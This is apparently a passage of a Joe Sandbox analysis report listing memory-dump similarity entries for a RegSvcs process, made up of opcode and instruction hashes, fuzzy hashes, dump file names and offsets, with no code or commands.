                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c6e2766e46df282959f4559e768cf457fe127a6c2a045297219239627b20e748
                                                        • Instruction ID: 4afc2495728209c8f4b17d8837e213d61045cd740cfdfd296ae581cbb8a52713
                                                        • Opcode Fuzzy Hash: c6e2766e46df282959f4559e768cf457fe127a6c2a045297219239627b20e748
                                                        • Instruction Fuzzy Hash: 7C217430A0020A9FC754EF68D4809AFB7F6FF89314B508529E51A9B361DB75AD06CF91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3799910397.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_12ad000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 75261e4363b1223701f9db964c332c5c45df1013ba6c6dda318fa640656efbca
                                                        • Instruction ID: 5b42d8b706a337365bff53785d89e33c1c42d5e0d6d1f74b0c3685010ead6ead
                                                        • Opcode Fuzzy Hash: 75261e4363b1223701f9db964c332c5c45df1013ba6c6dda318fa640656efbca
                                                        • Instruction Fuzzy Hash: 5C2125B1514348EFEB05DF94D8C0B66BFA5FB84324F60C5A9E9090B646C336E456CAA2
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d787ceb2c6d916add442978c3d598a0afd62bffd31d5ed4c326c911ac8b83fc9
                                                        • Instruction ID: 9efeb7a0efdedc1ea5dc88c90a9d68231850f0b4c99dca5b188e19266e2c341a
                                                        • Opcode Fuzzy Hash: d787ceb2c6d916add442978c3d598a0afd62bffd31d5ed4c326c911ac8b83fc9
                                                        • Instruction Fuzzy Hash: 5F21EA347096918FC3179F78E46056B7FB2EFC620475481B6C941DB3A6DA3C5C068792
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 05c65b5a8bb53cc7e9085b0303cbf041670f05fe2161311865b5299d12ab036b
                                                        • Instruction ID: c637c5f6703d05f261edb8015caca48076a907a127daa92cb7189958af5554c2
                                                        • Opcode Fuzzy Hash: 05c65b5a8bb53cc7e9085b0303cbf041670f05fe2161311865b5299d12ab036b
                                                        • Instruction Fuzzy Hash: 05115E77B09244AFDB01DA689C166AEFBF9FF46200F4945A6D905E7201EC308D049791
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 26e181cb2a4f09d4db35e6ddbe8cc2f6590b1ed3c9734938948205365a68a766
                                                        • Instruction ID: 5828e00435be22b3a0ffb60ccecea2f358db89b6dda637b6811890a2e55f4c53
                                                        • Opcode Fuzzy Hash: 26e181cb2a4f09d4db35e6ddbe8cc2f6590b1ed3c9734938948205365a68a766
                                                        • Instruction Fuzzy Hash: 17219070A0064A9FCB11DF79C880AEABBF1FF49220B04465AE449D7712D734E945CF90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ae76ba8b3e2005955ae935b1172d04e3c995b8ed6936dfdac6f6a8677a1efa0b
                                                        • Instruction ID: 4316e348ebe00db0bf2026bb48f77164abb34975f4819f2dbcaf6347a500b956
                                                        • Opcode Fuzzy Hash: ae76ba8b3e2005955ae935b1172d04e3c995b8ed6936dfdac6f6a8677a1efa0b
                                                        • Instruction Fuzzy Hash: FA214AB2A102189FCB05DF99D8808DEBBF9FF88310B148166E506E7350DA35AD06CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 38ca09dd4f28de94f371e6eb825b24f7343785f4495cebce043565a582e57116
                                                        • Instruction ID: 7acb58c9ae0b93e57c53fde3e59a0778702e5d15c42f50dc509bd7e4d9e0cd4c
                                                        • Opcode Fuzzy Hash: 38ca09dd4f28de94f371e6eb825b24f7343785f4495cebce043565a582e57116
                                                        • Instruction Fuzzy Hash: 3F319338B516199FDB14DF58E594A6EBBF2FF88304F244569E902AB394CB74AC41CB80
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6e53b03d93a4b862bcc08e14bb51424cdc27ee6ab1619e2352c95ba08e1d84a4
                                                        • Instruction ID: 6c95f00d48fb7ba7e5d27a8e506ee1d7953c01e74ca53764b697dd75eb5ef226
                                                        • Opcode Fuzzy Hash: 6e53b03d93a4b862bcc08e14bb51424cdc27ee6ab1619e2352c95ba08e1d84a4
                                                        • Instruction Fuzzy Hash: F2210770200A118FD328DF19D544E67F7E9FF44324F45CA69D49A8BAA1C772EC85CB90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800680499.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d40000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e33d4e9bf4463db0f6b95c8b53987f1c1b924bebc53ec6539cd501f06775b48d
                                                        • Instruction ID: 2b0b3e027e151a8ce1f50fa6823acdbc51b33145234e91fbefd1134303b4e759
                                                        • Opcode Fuzzy Hash: e33d4e9bf4463db0f6b95c8b53987f1c1b924bebc53ec6539cd501f06775b48d
                                                        • Instruction Fuzzy Hash: 6D117A3160E3D06FCB124B94885579ABFB6EF83714F0900ABF548DB392CA714D06C7A2
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a52a07ef077d576680ad70463de24bf160c6b5d0a172c5994983ad515d90d20b
                                                        • Instruction ID: 5f9a9022cc0eb9d3cd4317f818ffebeb689739b4eb1ca12f5df0b7fc7d459363
                                                        • Opcode Fuzzy Hash: a52a07ef077d576680ad70463de24bf160c6b5d0a172c5994983ad515d90d20b
                                                        • Instruction Fuzzy Hash: DF11E134B016149BD754EFB5D4102AFBBF2EB84720F408929D506AB380DF789D068BC6
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800680499.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d40000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4eb5a30582d8fd9b96b30bac2e21c3f418f33f4d085d3fe1b85dcf1747d358cc
                                                        • Instruction ID: bdc54d7895a3599e3a51da323df78377f14bfa8e8f06c8296d79bafb75246042
                                                        • Opcode Fuzzy Hash: 4eb5a30582d8fd9b96b30bac2e21c3f418f33f4d085d3fe1b85dcf1747d358cc
                                                        • Instruction Fuzzy Hash: B411DF31E0A6648FDB2A4B6098142BDBB75AF41311F0548ABC646EB781CB308D45CBD1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 12d0f79bfecf4e2ea93a6b6399edc1c0b327fff796352cfd907700652cd17494
                                                        • Instruction ID: 089e96cdb6665ac98a2468af60336e4dbd3bb56c0fc8e27d62b745114a6d7906
                                                        • Opcode Fuzzy Hash: 12d0f79bfecf4e2ea93a6b6399edc1c0b327fff796352cfd907700652cd17494
                                                        • Instruction Fuzzy Hash: 441160703043509FD724CB29E888E53BBF9FB89218B1499A9E04ACB792D731EC06CB50
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800680499.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d40000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 035c95ee116b13e4b17e1434a9f45998f11853cb171bc23a4dc9fd77796b945b
                                                        • Instruction ID: f04c4cb229c12c1405652d1de51ca4f18c630c4d710b9347745e35372a9b3b06
                                                        • Opcode Fuzzy Hash: 035c95ee116b13e4b17e1434a9f45998f11853cb171bc23a4dc9fd77796b945b
                                                        • Instruction Fuzzy Hash: 13118871E093908FC7124B5488112EABFB6EF82A24F1580BBC108DB352DF318C09CBE2
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5053c1f9e7c1509f051cece8372792fa9ae4a68bffa033e1e3296d438f12f0b6
                                                        • Instruction ID: 01d31b4a7e806527eff789db8da8ed52086d2fcd76950b6586b1dd0316c510e2
                                                        • Opcode Fuzzy Hash: 5053c1f9e7c1509f051cece8372792fa9ae4a68bffa033e1e3296d438f12f0b6
                                                        • Instruction Fuzzy Hash: C2117C35B00A168BD315EF68E15466B77E3EBC8610B608564C9069B358DE3DAC024BD2
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ac27ef2ff43758f0bf28ac096e06ee85f8349edbe2737d4b6d3ddc721b712480
                                                        • Instruction ID: c5e996a189b3a215954bd447a598410a95cf80fba4a60efe83e70ea806f23e8b
                                                        • Opcode Fuzzy Hash: ac27ef2ff43758f0bf28ac096e06ee85f8349edbe2737d4b6d3ddc721b712480
                                                        • Instruction Fuzzy Hash: 9711BF74B106148BD794EFB5D4102AF7BF2EB84710F408929D60AAB380DF789D068BC6
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1315917021c36486b5e673db2918a9d5c9a4ee23db0ec8579487325414ab0340
                                                        • Instruction ID: 55af70b1b9f6bc8439955c25e333849aecfd21b9c1372a7151898d347f7eaa78
                                                        • Opcode Fuzzy Hash: 1315917021c36486b5e673db2918a9d5c9a4ee23db0ec8579487325414ab0340
                                                        • Instruction Fuzzy Hash: AB01226210A3845FEB06D7B8CC123C9BFB1EB03210F9940E7E444CB293DA2ED80A9759
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3799910397.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_12ad000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                                                        • Instruction ID: b9c41427b2d0f7cb8dce59429203031f3c8c285f91d2728943b21853764a0af2
                                                        • Opcode Fuzzy Hash: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                                                        • Instruction Fuzzy Hash: DA110376404284CFDB12CF54D5C4B56BF72FB84314F24C5A9D9490B657C336E456CBA1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 956c38bea1bfc5ed5022370d5da81b1d0b5b6faf61b71e6f0056c67a2c53c38a
                                                        • Instruction ID: b02b8875126ad0bda8308ae85dce4c8a8a97342631a4506bfd67cdb02f62ad09
                                                        • Opcode Fuzzy Hash: 956c38bea1bfc5ed5022370d5da81b1d0b5b6faf61b71e6f0056c67a2c53c38a
                                                        • Instruction Fuzzy Hash: 0A119434B105158BDB189FA8D8187AF77A2EBC9704F208169D942FB384CF795C068B91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 07f3eeb973c91a1a9eaefa3adcf5ba061651c2afe2d7e34ff858fbec38420320
                                                        • Instruction ID: f8035d6adf45a5629e3aaa5af572d9716f62618bddf665985ded77b1f87014ec
                                                        • Opcode Fuzzy Hash: 07f3eeb973c91a1a9eaefa3adcf5ba061651c2afe2d7e34ff858fbec38420320
                                                        • Instruction Fuzzy Hash: 5701C472608B904FD331DB1CD846ADBBBE4FB46310F1988AED459CB751D635A80687A1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3a678f97ac45771be20764b92f1aa1fae5d28c3c844272eb3ad0941ffe0fc28d
                                                        • Instruction ID: f449353b50acd347e567b298965db46534fa3a8ead6adee4ee87306e99267de2
                                                        • Opcode Fuzzy Hash: 3a678f97ac45771be20764b92f1aa1fae5d28c3c844272eb3ad0941ffe0fc28d
                                                        • Instruction Fuzzy Hash: 7B11E030B002648BDB18EFA8C8147AE7BA2AB89714F200168D602BB380CF791C02C7D5
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8aba27bbdf7434b68b434acb5d24490cb835534f6e66414981eb30f4e4495ee7
                                                        • Instruction ID: a5d16993c0a7e8eb76379557e8094f2d35c7eee19774b18841de594622fb6977
                                                        • Opcode Fuzzy Hash: 8aba27bbdf7434b68b434acb5d24490cb835534f6e66414981eb30f4e4495ee7
                                                        • Instruction Fuzzy Hash: 7B11AD34B047008FD3608F69D84493ABBF6EFC925171859AEE489CB751DA31EC40CB10
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 61f65aef0ef72d9e8ce90d08b9e6db48804dbcc43cbd2c9808ea49c6a0164ad5
                                                        • Instruction ID: cac040c354c492a7d3ca9198900ae67f861923ec77d8e708fa49033e0a41010a
                                                        • Opcode Fuzzy Hash: 61f65aef0ef72d9e8ce90d08b9e6db48804dbcc43cbd2c9808ea49c6a0164ad5
                                                        • Instruction Fuzzy Hash: DB11E535A142448FD345DFA8D9167AF3FB6EB88310F504066EA06EB3D0CA389D05CB92
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fc15c6c0d5730f2a5733540425a854a0a2c7a513e80f51da4b89f5cf2d95023a
                                                        • Instruction ID: da3d493e511024639aa679b110f6d99210d19b16462356a3b6e48dc5b2c794a4
                                                        • Opcode Fuzzy Hash: fc15c6c0d5730f2a5733540425a854a0a2c7a513e80f51da4b89f5cf2d95023a
                                                        • Instruction Fuzzy Hash: A0116534B105158BDB18AFA8D4187AF7BA2EBC9704F108129D502F73C4CF795C058BD1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4c7dd190f498f2fe05c384c122b05f7b7ef07501de3b346da45156f9ac213a3d
                                                        • Instruction ID: b8c19551b566a403fd2b00b0b47c1fa52a66c51cca184c03b7b93582eabad2d1
                                                        • Opcode Fuzzy Hash: 4c7dd190f498f2fe05c384c122b05f7b7ef07501de3b346da45156f9ac213a3d
                                                        • Instruction Fuzzy Hash: 6201D67130020AABD710EF19D880E9B77E6FBC4724B008539F60A8B750CF75EC058B91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 384e3ae860b3d0a16fa63e8d144ffaccbfe206e2254167e1ae8ef24c5d382f57
                                                        • Instruction ID: 218164077bae8b751e37265edfd2243cd587b887bd315ff56897893cad445a2f
                                                        • Opcode Fuzzy Hash: 384e3ae860b3d0a16fa63e8d144ffaccbfe206e2254167e1ae8ef24c5d382f57
                                                        • Instruction Fuzzy Hash: 7A01B531B042089FD744DFA8E54179F7BE9FFC5210B2045BAD40AD7780DE359D018791
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 267dd972323151b935aafcce43c9a6853957f68fe1e89d96c4b9461302bcea33
                                                        • Instruction ID: 4e6b8a07fbc5d3af0cb85dd0ae03c0f01802d0ada987fb46728e5505cbd2728f
                                                        • Opcode Fuzzy Hash: 267dd972323151b935aafcce43c9a6853957f68fe1e89d96c4b9461302bcea33
                                                        • Instruction Fuzzy Hash: A3018430B102259BDB59AFA8D8147AE77E2EBC8714F200169D602BB3C4CF795C05DBD9
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 110676be321b1146b77ef2bf783a8e44b442b537287440ff98d138a41d31f496
                                                        • Instruction ID: fb7cfbdb89b9b70c2c25ab37c4b284fdee98dd3e876da85497c0e3d3cc45844f
                                                        • Opcode Fuzzy Hash: 110676be321b1146b77ef2bf783a8e44b442b537287440ff98d138a41d31f496
                                                        • Instruction Fuzzy Hash: D901D6363416156F8B056F99EC848AFBF5AFBC8320B10C03AFA0AC7750CE368C259760
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f65c61a7ed812069533d24d4ab3a875e3120ebe982a60ddb1b42ee8a7b132838
                                                        • Instruction ID: ec0511505792c6bbd52fe475c6dbb494c765a7af4fa305adf302e6663729ff57
                                                        • Opcode Fuzzy Hash: f65c61a7ed812069533d24d4ab3a875e3120ebe982a60ddb1b42ee8a7b132838
                                                        • Instruction Fuzzy Hash: 1D0128793002048FD7249B69D888E2AB7FAEBCD265714446DE549DB751DA31EC018B50
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 67eaa243166badfd4866ef66efbd9e86d3a5d9f9122ea0aafa58ae06033ec9ad
                                                        • Instruction ID: 65113eb67657a972cf84316cdf1b3ab28c0cc2dfa21a2349958b45bb9c535930
                                                        • Opcode Fuzzy Hash: 67eaa243166badfd4866ef66efbd9e86d3a5d9f9122ea0aafa58ae06033ec9ad
                                                        • Instruction Fuzzy Hash: 1C1122B18003588FDB20DF9AC844BDFBBF4AB48324F248459D559A7350C374A940CFA5
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3799910397.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_12ad000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 95656da61dc440c2d5c92512ef21d6918fb69b28c62abe610cbf81442ada1a4a
                                                        • Instruction ID: fdbfba8fb54d595312c6e13525f9a4698711b5665fc54ccf1ea1b86554902113
                                                        • Opcode Fuzzy Hash: 95656da61dc440c2d5c92512ef21d6918fb69b28c62abe610cbf81442ada1a4a
                                                        • Instruction Fuzzy Hash: E801DB715183489FE7208A95CC84767FBD8EF41334F54C45AEE5D0B583C3759845CAB5
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d72a2f75b121bc8b1e49f9a653eb337092011286043fbc50578d7502bfa65557
                                                        • Instruction ID: 6a846fa780331f2d5db2ff5bf72b64614b199369298b3737d52540c7c907212e
                                                        • Opcode Fuzzy Hash: d72a2f75b121bc8b1e49f9a653eb337092011286043fbc50578d7502bfa65557
                                                        • Instruction Fuzzy Hash: D61100B5C003488FDB20DFAAC848BDFBBF4AB48324F20845AD559A7250C379A944CFA5
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fbc7b9c91a659dbf53e22e5d7153c5f15f775452109ee443f47b3a8a29cbbd94
                                                        • Instruction ID: c2e8154d1c5849285e5b4493051bb6bce044b8d85e9784bc9f8095251238fa40
                                                        • Opcode Fuzzy Hash: fbc7b9c91a659dbf53e22e5d7153c5f15f775452109ee443f47b3a8a29cbbd94
                                                        • Instruction Fuzzy Hash: CA015E35A102049BD344DFA8D9067AF7BB6EB88710F504065EA0AAB3C4DA395D058B91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 954ad91833482640c6dbdd4032c1a5c11c8d74bc5887b3858f5c5fa51b56fc00
                                                        • Instruction ID: f03a4fa41d3f1989209064afb42748c2ddd17662a156900f3a574b1d846726b3
                                                        • Opcode Fuzzy Hash: 954ad91833482640c6dbdd4032c1a5c11c8d74bc5887b3858f5c5fa51b56fc00
                                                        • Instruction Fuzzy Hash: 9DF0E967B0E1621BFF2145289C9B7EDEBA5FB95220F99096DD846D3305DCD4C8058281
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 76629ea61bff0e952380a5354abb6116973389ddb9285012b615e82ef657d911
                                                        • Instruction ID: a89112054e6a4a51c0e54e7bd52f692e01e337fbd9135eaa191d06df56c8a3f5
                                                        • Opcode Fuzzy Hash: 76629ea61bff0e952380a5354abb6116973389ddb9285012b615e82ef657d911
                                                        • Instruction Fuzzy Hash: CE014F3054A3899FC702DFB898625997FB1EF07204B0645EBC444DB2A3D9791D09D7A6
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 09be3b8b696c10f236b1823b681eda3f58b1126fa506b170f145f17434e7c3ad
                                                        • Instruction ID: 30a3b471825523d1c2af1afa39fbb81b2a215929ecd387d71f8ec18e40a8d246
                                                        • Opcode Fuzzy Hash: 09be3b8b696c10f236b1823b681eda3f58b1126fa506b170f145f17434e7c3ad
                                                        • Instruction Fuzzy Hash: A301AD74710215CBDB59EF64D920BBE7BA2EB88705F200258C602B73D6CB795C42DBD5
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 83300cad0c9a86209edf1bca513829e2644bcf1b2ef14889f78e48afc8fcc0b7
                                                        • Instruction ID: cf5637b317aaf68a32f48868b4e54064c45d022d54027494ecca49105620699b
                                                        • Opcode Fuzzy Hash: 83300cad0c9a86209edf1bca513829e2644bcf1b2ef14889f78e48afc8fcc0b7
                                                        • Instruction Fuzzy Hash: 51F0BB353006158BDA346A58AD0476B73D7E7C4514F104437DB0A9B3D0EFB5EC0187E5
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
